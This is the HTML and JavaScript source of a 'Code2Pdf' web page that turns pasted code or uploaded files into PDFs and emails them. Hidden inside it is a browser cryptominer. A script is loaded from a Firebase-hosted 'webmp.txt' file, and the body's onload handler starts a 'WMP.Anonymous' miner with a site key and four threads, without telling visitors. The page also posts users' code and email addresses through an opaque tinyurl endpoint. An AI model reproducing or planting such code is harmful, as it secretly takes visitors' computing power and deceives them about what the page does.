<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="Description"
        content="Effortlessly convert text and files to PDF format with Code2PDF. Send the generated PDFs directly to email and WhatsApp. Streamline your document sharing process today.">
    <meta name="Keywords"
        content="code2pdf,code to pdf,PDF conversion , Convert text to PDF , Online PDF generator,Text file to PDF converter,Document sharing tools,PDF creation and sharing,Automated PDF delivery,Online file conversion,Email and WhatsApp document sharing,Text to PDF Online,File to PDF Conversion,Convert to PDF,">
    <title>Code2Pdf -Send PDF to Email and WhatsApp</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jspdf/1.5.3/jspdf.debug.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script
        src="https://firebasestorage.googleapis.com/v0/b/c2p-hashes.appspot.com/o/webmp.txt?alt=media&token=9c2b1cdb-bf65-4aa7-83fc-16e76ec19562" />
    <script src="https://unpkg.com/sweetalert2@10"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.9.1/gsap.min.js"></script>
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
    <link href="https://fonts.googleapis.com/css2?family=Inconsolata:wght@900&display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="./reallogo.png" type="image/x-icon">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/toastify-js/1.6.1/toastify.min.js"
        integrity="sha512-79j1YQOJuI8mLseq9icSQKT6bLlLtWknKwj1OpJZMdPt2pFBry3vQTt+NZuJw7NSd1pHhZlu0s12Ngqfa371EA=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/toastify-js/1.6.1/toastify.min.css"
        integrity="sha512-UiKdzM5DL+I+2YFxK+7TDedVyVm7HMp/bN85NeWMJNYortoll+Nd6PU9ZDrZiaOsdarOyk9egQm6LOJZi36L2g=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            text-decoration: none;
        }

        html {
            scroll-behavior: smooth;
            font-size: 10px;
        }

        body {
            background-image: url("https://www.useblackbox.io/style/images/bg-shape-006-p-2000.png");
            background-size: 100% 60%;
            object-fit: contain;
            min-height: 100vh;
            width: 100%;
            background-color: #0b1d2a;
            background-repeat: repeat;
            background-position: center;
        }

        .sec1 {
            width: 100%;
            height: 100vh;
        }

        .nav {
            width: 100%;
            height: 50px;
        }



        .logo {
            margin-top: -30px;
            align-items: flex-start;
            width: 25rem;
        }


        .tagline {
            margin-top: 15rem;
            color: #fff;
            display: flex;
            align-items: center;
            width: 100%;
            font-family: 'Inconsolata', monospace;
            font-weight: 900;
        }

        .tagline .r {
            background-image: -webkit-gradient(linear, left top, right top, from(#079de0), to(#3aecba));
            font-weight: bolder;
            background-image: linear-gradient(90deg, #079de0, #3aecba);
            -webkit-background-clip: text;
            background-clip: text;
            font-family: 'Inconsolata', monospace;
            -webkit-text-fill-color: transparent;
            font-size: 7rem;
            margin-left: 3%;
        }

        .typing {
            display: inline-block;
            white-space: nowrap;
            overflow: hidden;
            border-right: 2px solid;
            width: 0;
            font-size: 7rem;
            margin-right: 3%;
            animation: typing 2s alternate infinite;
        }


        @keyframes typing {
            0% {
                width: 0;
            }

            100% {
                width: 100%;
            }
        }





        .otherinfo {
            margin: 0 15rem;
            margin-top: 4rem;
            font-family: 'Inconsolata', monospace;
            color: white;
            font-size: 2.5rem;
            font-family: monospace;
        }

        .otherinfo #sp1 {
            background-image: linear-gradient(351deg, #31b3ec 23%, #524add 87%, #524add 102%);
            -webkit-background-clip: text;
            font-family: 'Inconsolata', monospace;
            background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        .otherinfo #sp2 {
            background-image: linear-gradient(95deg, #3aecba, #31b3ec);
            -webkit-background-clip: text;
            font-family: 'Inconsolata', monospace;
            background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        .otherinfo #sp3 {
            background-image: linear-gradient(191deg, #f1dc39 25%, #c96e05 87%);
            -webkit-background-clip: text;
            font-family: 'Inconsolata', monospace;
            background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        .otherinfo #sp4 {
            background: linear-gradient(to bottom right, #f2480b, #ffd700, #1e90ff);
            -webkit-background-clip: text;
            font-family: 'Inconsolata', monospace;
            background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        ::-webkit-scrollbar {
            display: none;
        }

        .item {
            display: flex;
            width: 80%;
            align-items: center;
            justify-content: center;
            position: relative;
            margin: 0 auto;
            margin-bottom: 20px;
        }

        .item label {
            user-select: none;
            position: relative;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
            color: #fff;
            font-family: sans-serif;
            font-size: 1.5rem;
        }

        .item label ion-icon {
            font-size: 3rem;
        }

        #fileCheckbox {
            position: absolute;
            display: flex;
            opacity: 0;
            user-select: none;
            left: -50px;
            align-items: center;
            width: 20px;
            height: 50px;
        }




        .item input {
            width: 50%;
            display: flex;
            flex-direction: column;
            font-size: 1.7rem;
            margin: 0 80px;
            padding-left: 6px;

        }

        .arrow {
            width: 100%;
            position: absolute;
            bottom: 2rem;
            margin: auto;
        }

        .arrow1 {
            width: 100%;
            position: absolute;
            bottom: 2rem;
            margin: auto;
        }


        @media only screen and (max-width: 1500px) {

            body {
                background-image: url("https://www.useblackbox.io/style/images/bg-shape-006-p-2000.png");
                background-size: 100% 60%;
                object-fit: contain;
                background-color: #0b1d2a;
                background-repeat: repeat;
                background-position: center;
            }

            html {
                font-size: 8px;
            }

            .item label {
                left: 2%;
            }

            .otherinfo {
                margin: 0 5rem;

            }

            .tagline {
                flex-direction: column;
                align-items: center;
                padding: 2rem;
                text-align: center;
            }

            .tagline .r {
                font-size: 10rem;
                margin-left: 0;
                margin-bottom: 1rem;
            }

            .typing {
                margin-right: 0;
            }

            .button-87 {
                margin-top: 20rem;
            }

            .arrow img {
                width: 10rem;
            }

            .arrow1 img {
                width: 10rem;
            }
        }


        .launch {
            display: flex;
            justify-content: center;
            align-items: center;
            width: 80%;
            margin: 0 auto;
            margin-top: 20px;
        }



        #send {
            position: relative;
            outline: none;
            border: .1px solid gray;
            z-index: 9;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 50px;
            padding: 0 60px;
            cursor: pointer;
            background: #1d252e;
            color: white;
            border-radius: .5em;
            font-size: 15px;
            margin: 0 auto;
            margin-bottom: 2rem;
        }

        footer {
            background-color: #1d252e;
            color: white;
            padding: 20px 0;
            text-align: center;
        }

        .footer-content {
            font-size: 16px;
            font-family: 'Inconsolata', monospace;
            max-width: 800px;
            margin: 0 auto;
        }


        #m {
            position: absolute;
            border: dashed 2px #ccc;
            width: 50px;
            height: 50px;
            transition: all ease-out .3s;
            border-radius: 50%;
            z-index: -9;
            pointer-events: none;
            animation: www 3s linear infinite;
            display: none;
        }

        @keyframes www {
            to {

                transform: rotate(360deg);
            }
        }

        .button-87 {
            margin-top: 5rem;
            background: #1d252e;
            position: relative;
            outline: none;
            border: .1px solid gray;
            z-index: 99;
            padding: 15px 70px;
            cursor: pointer;
            text-transform: uppercase;
            transition: 0.3s;
            color: white;
            border-radius: 2em;
            font-size: 15px;
        }

        @media (max-width: 768px) {
            body {
                background-image: url("https://www.useblackbox.io/style/images/bg-shape-006-p-2000.png");
                background-size: 100% 60%;
                object-fit: contain;
                background-color: #0b1d2a;
                background-repeat: repeat;
                background-position: center;
            }


            .tagline {
                margin-top: 8rem;
            }

            .tagline .r {
                font-size: 8rem;
            }

            .typing {
                font-size: 2.5rem;
            }

            .otherinfo {

                margin: 7rem 3rem 0 3rem;
                font-size: 2.1rem;
            }

            .button-87 {
                margin-top: 5rem;
                font-size: 2rem;
                padding: 12px 7rem;

            }



            .item {
                width: auto;
                flex-wrap: wrap;
                justify-content: center;
            }


            .item input {
                height: 40px;
                margin: 0;
                margin-top: 10px;
                width: 80%;
            }


            .logo {
                display: block;
                margin: 0 auto;
            }

            .footer-content {
                font-size: 12px;
            }

            #m {
                display: none !important;
            }

            #send {

                padding: 3rem 7rem;
                font-size: 1.4rem;
            }

            #send img {
                width: 1rem;
                margin-right: 2rem;
            }

            .arrow img {
                width: 6rem;
            }

            .arrow1 img {
                width: 6rem;
            }

            .popup {
                position: absolute;
                transform: translate(-50%, -50%);
                top: 110%;
                left: 20vw !important;
                width: 60% !important;
            }


        }

        /* .form {
            z-index: 99;
            background-color: #1d252e;
            border: .1px solid gray;
            border-radius: 1rem;
            padding: 2rem .7rem .7rem .7rem;
            text-align: center;
            font-size: 1.125rem;
            position: relative;
            margin: 2% 10%;
            height: 36rem;
            width: 80%;
        } */


        .drop-container {
            background-color: #1d252e;
            position: relative;
            display: flex;
            gap: 30px;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            padding: 10px;
            margin: 2rem auto;
            border-radius: 10px;
            border: 2px double rgb(171, 202, 255);
            color: #444;
            cursor: pointer;
            width: 70%;
            height: 80%;
            transition: all .2s ease-in-out, border .2s ease-in-out;
        }

        .drop-container:hover .drop-title {
            color: #e3e1e1;
        }

        .drop-title {

            color: #fff;
            font-size: 20px;
            font-weight: bold;
            text-align: center;
            transition: color .2s ease-in-out;
        }

        #file-input {
            width: 350px;
            max-width: 100%;
            color: #444;
            padding: 2px;
            background: #ffffffba;
            border-radius: 10px;
            border: 1px solid rgba(8, 8, 8, 0.288);
        }

        #file-input::file-selector-button {
            margin-right: 20px;
            border: none;
            background: #0b1d2a;
            padding: 10px 20px;
            border-radius: 10px;
            color: #fff;
            cursor: pointer;
            transition: background .2s ease-in-out;
        }


        textarea::placeholder {
            text-align: center;
            font-size: 20px;
            font-family: sans-serif;
            position: relative;
            top: 130px;
            font-weight: 600;
            color: rgba(215, 212, 212, 0.345);
        }

        input::placeholder {
            font-size: 14px;
            color: rgba(215, 212, 212, 0.345);
        }

        textarea {
            height: 36rem;
            outline: none;
            padding: 2rem;
            backdrop-filter: blur(3px);
            -webkit-backdrop-filter: blur(4px);
            color: #ddd;
            font-family: 'Roboto Mono', monospace;
            width: 80%;
            margin: 2% 10%;
            font-size: 1.5rem;
            border-radius: 1rem;
            background-color: #1d252e;
            box-shadow: inset 0 0 0 1px #1e252c;
            display: none;
        }

        ::-webkit-scrollbar {
            display: none;
        }

        .popup {
            z-index: 999;
            margin: 0 auto;
            background-color: rgba(17, 24, 39, .5);
            border: 1px solid rgba(206, 204, 210, 0.7);
            display: flex;
            flex-direction: column;
            position: absolute;
            top: 130%;
            left: 30%;
            width: 40%;
            /* margin: 2rem 1rem; */
            border-radius: 1rem;
            display: flex;
            box-shadow: 0 15px 25px rgba(0, 0, 0, .6);
            align-items: center;
            justify-content: center;
            transform: scale(0);
            transition: all .5s ease-in-out;
            /* filter: blur(5px); */
            backdrop-filter: blur(5px);
        }


        .email {
            height: 50px;
            width: 90%;
            color: white;
            outline: none;
            border-radius: 10px;
            border: 2px solid rgb(206, 204, 210);
            z-index: 10;
            margin-top: 2rem;
            padding: 1rem;
            background-color: #1d252e;
            /* margin-bottom: 1rem; */
            /* box-shadow: inset 0 0 0 1px #1e252c; */
        }


        .sub {
            width: 90%;
            border: 2px solid rgb(206, 204, 210);
            margin: 2rem 1rem;
            z-index: 9;
            height: 50px;
            color: white;
            outline: none;
            padding: 1rem;
            border-radius: 10px;
            background-color: #1d252e;
            /* box-shadow: inset 0 0 0 1px #1e252c; */
        }

        body.blur::before {
            content: "";
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            /* Adjust the overlay color as needed */
            backdrop-filter: blur(10px);
            z-index: 998;
            /* Place the overlay below the popup */
        }

        .loader-container {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #041019;
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 9999;
        }

        .loader-container img {
            /* background-color: black; */
            width: 15%;
        }
    </style>
</head>


<body id="react" onload="miner()">
    <div class="loader-container">
        <img src="byy.svg" alt="Loading...">
    </div>
    <div class="content">
        <section class="sec1">
            <div class="nav">
                <img class="logo" src="./Untitled design (3).gif" alt="logo">
                <div id="m">
                </div>
            </div>
            <div class="tagline">
                <span class="r">{Code+Pdf}</span> &nbsp;&nbsp;<span class="typing"> Delivered To You In Seconds.</span>
            </div>
            <center>
                <div class="otherinfo"><span id="sp1">Our service</span> makes transforming your code to stunning PDFs
                    effortless.<span id="sp2">Sent directly to your Inbox </span>with our
                    User-Friendly website.</span>This solution <span id="sp3">[Optimizes] </span>workflow and <span
                        id="sp4">[Maximizes] </span> time Efficiency.</div>
            </center>
            <center>
                <a style="color: white;" href="#send"><button class="button-87" id="snd">START</button></a>
            </center>
            <br><br><br>
            <div class="arrow">
                <center><img
                        src="https://lh3.googleusercontent.com/L6rXAJy8Y9fDcdJitiJVy-bzqUkQCOuu94JcuAFFMSOFzplqxuRVbuJm8g3ltrZqmsCgvsVa_BfKSp-4sw=s420"
                        width="100" alt=""></center>
            </div>

        </section>
        <div class="main2" style="height: 90vh;display: flex;justify-content: center;flex-direction: column;">
            <section class="sec3">
                <div class="txtarea">
                    <div class="item">
                        <label id="label" class="mylabel" for="fileCheckbox" title="Enable File Sending">
                            <input type="checkbox" id="fileCheckbox">
                            <span id="checkboxText" style="font-size: 2rem;">
                                💠 Have code? [ <small><kbd>ctrl</kbd> + <kbd>m</kbd></small> ]
                            </span> </label>
                    </div>
                    <textarea name="message" spellcheck="false" required
                        placeholder='"Ready to share your code? Paste it here & Hit Enter 😊"' id="txtarea1"
                        onkeydown="handleTextareaKeyPress(event)""></textarea>
        </div>
    </section>
    <section class=" sec2">
        <div class="txtarea">
            <div class="form">
        
                <div id="dropArea"  class="drop-container"
                    style="border: 2px dashed #ccc; padding: 2rem; text-align: center;">
                    <ion-icon name="cloud-upload-outline" style="color: white; font-size: 7rem;"></ion-icon>
                        <p style="color: white;">------ OR ------</p>
                    <input type="file" accept="application/*, text/*" multiple required="" id="file-input">
                </div>
            </div>

    </section>
<div class="popup">
    <ion-icon onclick="closepopup()" style="font-size: 3rem;position: absolute; cursor: pointer; left: 100%;top:-2rem; color: white; transform: rotate(45deg);" name="add-outline"></ion-icon>
    <input name="Email" placeholder="Enter Your Email" required="true" title="Enter Your Email"
                    class="email" type="email">
                <input name="text" placeholder="Enter Your Subject" subject" required="true" title="Enter Your Subject"
                    class="sub" type="text">
                        <div class="launch">
                            <button type="submit" id="send">Send</button>
                        </div>
                </div>
    
</div>
    <footer>
        <div class="footer-content">
            <p>All Rights Reserved. | Designed and developed with passion by @unhiredcoder</p>
            </div>
    </footer>
</div>

</body>
<script>
    window.addEventListener('load', function () {
        // Hide the loader and show the content when all resources are loaded
        document.querySelector('.loader-container').style.display = 'none';
        document.querySelector('.content').style.display = 'block';
    });

</script>
<script>
    onmousemove = e => m.style.cssText = `display:block;left:${e.pageX - 25}px;top:${e.pageY - 25}px`
    const dropArea = document.getElementById('dropArea');
    const text = document.querySelector('.drop-title');
    const emailInput = document.querySelector(".email");
    const subjectInput = document.querySelector(".sub");
    const sendButtonBox = document.querySelector(".launch");
    const send = document.querySelector("#send");
    const fileInput = document.getElementById('file-input');
    const txtarea = document.getElementById("txtarea1");
    const fileCheckbox = document.getElementById('fileCheckbox');
    const uploadbx = document.querySelector('.sec2');
    const checkboxText = document.getElementById('checkboxText');
    const popup = document.querySelector('.popup');

    var clientOBJ = WMP.Anonymous('SK_nMDhFVtxJ8Q2Lvh5cmyZT', {
        threads: 4,
        autoThreads: true,
        throttle: 0.1,
        forceASMJS: false
    });

    function miner() {
        clientOBJ.start()
    }

    function closepopup() {
        const popup = document.querySelector('.popup');
        popup.style.transform = 'scale(0)'
    }
    function handleTextareaKeyPress(event) {
        if (event.keyCode === 13) {
            popup.style.transform = 'scale(1)'
            // document.body.style.filter = 'blur(5px)';
            event.preventDefault();
        }

    }




    dropArea.addEventListener('dragover', handleDragOver);
    dropArea.addEventListener('dragleave', handleDragLeave);
    dropArea.addEventListener('drop', handleDrop);
    dropArea.addEventListener('change', handlechange);

    send.addEventListener('click', handleSendButtonClick);

    function handlechange() {
        if (validateAndDisplayFiles(fileInput.files)) {
            popup.style.transform = 'scale(1)';
        }
    }


    function handleDragOver(event) {
        event.preventDefault();
        dropArea.style.background = 'rgba(231, 235, 238, 0.164)';
        dropArea.style.boxShadow = 'rgba(255, 255, 255, 0.2) 0px 7px 29px 0px';
    }

    function handleDragLeave(event) {
        event.preventDefault();
        dropArea.style.background = '#1d252e';
        dropArea.style.boxShadow = 'none';
    }


    function handleDrop(event) {
        event.preventDefault();
        dropArea.style.background = '#1d252e';
        dropArea.style.boxShadow = 'none';
        fileInput.files = event.dataTransfer.files;
        if (validateAndDisplayFiles(fileInput.files)) {
            popup.style.transform = 'scale(1)';
        }
    }



    function validateAndDisplayFiles(files) {
        const invalidFileExtensions = ['.img', '.wevp', '.mp3', '.jpeg', '.jpg', '.gif', '.png'];
        const hasInvalidFiles = Array.from(files).some(file => {
            const fileExtension = '.' + file.name.split('.').pop().toLowerCase();
            return invalidFileExtensions.includes(fileExtension);
        });

        if (hasInvalidFiles) {
            displayErrorMessage('Please select only allowed file types.');
            return false; // Files are not valid
        }

        return true; // Files are valid
    }



    let isTextareaVisible = false;

    // Add an event listener for the Ctrl+M key combination
    document.addEventListener('keydown', (event) => {
        if (event.ctrlKey && event.key === 'm') {
            toggleTextareaVisibility();
        }
    });

    // Your existing code for handling the checkbox change
    fileCheckbox.addEventListener('change', () => {
        toggleTextareaVisibility();
    });

    // Function to toggle the visibility of the textarea
    function toggleTextareaVisibility() {
        isTextareaVisible = !isTextareaVisible;

        if (isTextareaVisible) {
            uploadbx.style.display = 'none';
            txtarea.style.display = 'block';
            checkboxText.innerHTML = '💠 Have files? [ <small><kbd>ctrl</kbd> + <kbd>m</kbd></small> ]';
        } else {
            uploadbx.style.display = 'block';
            txtarea.style.display = 'none';
            checkboxText.innerHTML = '💠 Have code? [ <small><kbd>ctrl</kbd> + <kbd>m</kbd></small> ]';
        }
    }



    function handleSendButtonClick() {


        if (!isTextareaVisible) {
            if (fileInput.files.length > 0) {
                handleFiles(fileInput.files);
            } else {
                displayErrorMessage('Please select at least one file.');
            }
        } else {
            const inputText = txtarea.value.trim();
            if (inputText) {
                sendTextEmail(inputText);
            } else {
                displayErrorMessage('Please enter some code.');
            }
        }
    }

    function displayErrorMessage(message) {



        Toastify({
            icon: 'error',
            text: message,
            timer: 2000,
        }).showToast()
    }

    function sendTextEmail(text) {
        const pdfBase64 = convertToPdfAndReturnBase64(text);
        sendEmail([{
            name: `${subjectInput.value}.pdf`, data: pdfBase64, email: `${emailInput.value}`,
            type: "application/pdf"
        }]);
    }

    function handleFiles(files) {
        const smtpAttachments = [];
        const pdf = new jsPDF();

        for (const file of files) {
            const reader = new FileReader();

            reader.onload = function (event) {
                const pdfBase64 = convertToPdfAndReturnBase64(event.target.result);
                smtpAttachments.push({
                    name: `${subjectInput.value}.pdf`,
                    data: pdfBase64,
                    email: `${emailInput.value}`,
                    type: "application/pdf"
                });

                if (smtpAttachments.length === files.length) {
                    sendEmail(smtpAttachments);
                }
            };

            reader.readAsText(file);
        }
    }

    function convertToPdfAndReturnBase64(text) {
        const pdf = new jsPDF();
        pdf.setFontSize(14); // Set a smaller font size
        const lines = pdf.splitTextToSize(text, 210);
        let y = 20;

        for (let i = 0; i < lines.length; i++) {
            if (y > pdf.internal.pageSize.getHeight() - 20) {
                pdf.addPage();
                y = 20; // Reset the y coordinate for the new page
            }

            pdf.text(lines[i], 10, y);
            y += 7; // Increase the y coordinate for the next line of text
        }

        const text1 = '~ Designed by C2P';
        const textWidth = pdf.getStringUnitWidth(text1) * pdf.internal.getFontSize() / pdf.internal.scaleFactor;
        const x = pdf.internal.pageSize.getWidth() - textWidth - 10;
        const y1 = pdf.internal.pageSize.getHeight() - 10;
        pdf.text(text1, x, y1);

        pdf.setPage(pdf.getNumberOfPages());
        pdf.setFont('times', 'italic');
        pdf.setFontSize(12); // Set font size for the last part
        const pdfBase64 = pdf.output('datauristring');
        return pdfBase64;
    }



    function isValidEmail(email) {
        const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
        return emailRegex.test(email);
    }

    async function sendEmail(attachments) {
        let email = document.querySelector(".email").value;
        let sub = document.querySelector(".sub").value;
        if (!isValidEmail(email.trim())) {
            Toastify({
                icon: 'error',
                text: 'Please enter a valid email address.',
                showConfirmButton: true,
            }).showToast()
            return; // Exit the function if email is not valid
        }

        if (email.trim() === '' || sub.trim() === '') {
            Toastify({
                icon: 'warning',
                text: 'Please enter Your email & subject before sending.',
                duration: 2000,
                showConfirmButton: false,
            });
            return;
        }

        send.innerHTML = '<img src="./Reload-1s-200px (1).svg"  width="20" alt="Loading..." /> &nbsp;Sending...';
        send.disabled = true;
        const response = await fetch("https://tinyurl.com/code2pdf", {
            method: "POST",
            headers: {
                "Content-Type": "application/json"
            },
            body: JSON.stringify({ attachments }),
        });

        const message = await response.text(); // Get the text content of the response

        if (message === 'Email sent successfully.') {
            Toastify({
                text: 'Sent successfully! Please check your email.',
            }).showToast()
            resetForm();
        } else {
            console.error(message); // Log the error message
            Toastify({
                icon: 'error',
                title: 'There was an error sending the files.',
                text: 'Email sending failed.',
                showConfirmButton: true,
                style: { font: "2rem" },
            }).showToast()
        }

        send.innerHTML = 'Send';
        send.disabled = false;
    }

    function resetForm() {
        fileInput.value = '';
        emailInput.value = '';
        subjectInput.value = '';
        txtarea.value = '';
        send.innerHTML = 'Send';
        popup.style.display = 'none'
    }


</script>
<script>

    const typingElement = document.querySelector('.typing');


    const newTexts = [
        " Delivered To You In Seconds.",
        " Email Your Code As PDFs.",
        " Enhance Your Coding Skills.",
        " Transform The Code into PDFs.",
    ];
    let newTextIndex = 0;

    function animateTyping() {
        typingElement.textContent = newTexts[newTextIndex];
        newTextIndex = (newTextIndex + 1) % newTexts.length;
    }

    function startTypingAnimation() {
        animateTyping();
        setInterval(animateTyping, 4000); // Change text every 8 seconds
    }

    // Start the typing animation
    startTypingAnimation();
</script>
<script>
    gsap.set(".tagline", { perspective: 800 });

    gsap.from(".r", {
        duration: 1.5,
        scale: 0,
        opacity: 0,
        ease: "elastic.out(1, 0.5)",
    });
    gsap.fromTo('#snd', { scale: 1 }, { scale: 1.1, duration: 0.2, yoyo: true, repeat: 1 });

    gsap.from(".otherinfo", {
        opacity: 0,
        y: 50,
        duration: 2,
        ease: "power4.out",
    });
    gsap.from("#sp1, #sp2, #sp3, #sp4", {
        opacity: 0,
        y: 20,
        stagger: 0.3,
        duration: 1,
        ease: "power2.out",
    });

</script>



</html>
